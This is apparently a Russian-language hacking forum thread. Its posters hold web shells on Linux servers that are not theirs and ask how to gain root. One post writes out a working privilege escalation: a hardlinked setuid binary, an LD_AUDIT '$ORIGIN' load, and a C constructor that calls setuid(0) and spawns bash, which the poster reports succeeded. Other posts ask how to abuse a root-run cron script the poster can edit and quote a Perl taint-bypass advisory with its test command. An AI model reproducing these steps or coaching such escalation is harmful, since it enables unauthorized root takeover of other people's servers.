System Linux 2.6.18-194.11.1.el5.centos.plusPAE #1 SMP Wed Aug 11 09:10:13 EDT 2010 i686 Build Date Aug 14 2012 09:55:08 А здесь должны быть попроще, можете показать направление куда плыть))?
System Linux 2.6.18-194.11.1.el5.centos.plusPAE #1 SMP Wed Aug 11 09:10:13 EDT 2010 i686 Build Date Aug 14 2012 09:55:08 ты уверен что это прорбьет i686?
mkdir /tmp/dn ln /bin/ping /tmp/dn/target exec 3< /tmp/dn/target ls -l /proc/$$/fd/3 rm -rf /tmp/dn/ ls -l /proc/$$/fd/3 cat > payload.c void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); } ^D gcc -w -fPIC -shared -o /tmp/dn payload.c LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 Вот что помогло, всем спасибо!
доброй ночи, есть шелл на сервере под ОС Linux Kernel 2.6.32 есть возможность пользоваться консолью, возможно ли через консоль повысить права шелла до рута, отпишите что то полезное, ссылки на статьи приветствуются так же спасибо
Для начала нужно собрать как можно больше полезной информации по серверу: https://gist.github.com/nepohelovski/75ada5413f26498fba4f
Есть права на редактирование SH скрипта который запускается кроном . Как я понимаю крон запускается под рутом . Подскажите как это использовать ? Думаю добавить пользователя , но смущает процедура добавления пользователя в линуксе . Та же несколько раз спрашивается пароль , как это реализовать в sh скрипте ? Или может стоит добавить пользователя www-data в группу sudo ? Я новичок , не судите строго .
приветствую, есть шелл, пытаюсь поднать привилегии, но к сожалению ядро относительно свежее. Из уязвимых сервисов, установленных на серве, нашел описание security bypass для перла. Версия подходит. Не могу понять "контекст" этой уязвимости, что там за security bypass происходит и можно ли ее как то заюзать для поднятия прав? Может можно шеллкод как нибуть вставить? Подскажит плс Perl is prone to a security-bypass weakness that occurs when laundering tainted input. Attackers can leverage this issue to bypass security checks in perl applications that rely on TAINT mode protection functionality. This opens such applications up to potential attacks that take advantage of the software's failure to properly sanitize user-supplied input. perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))'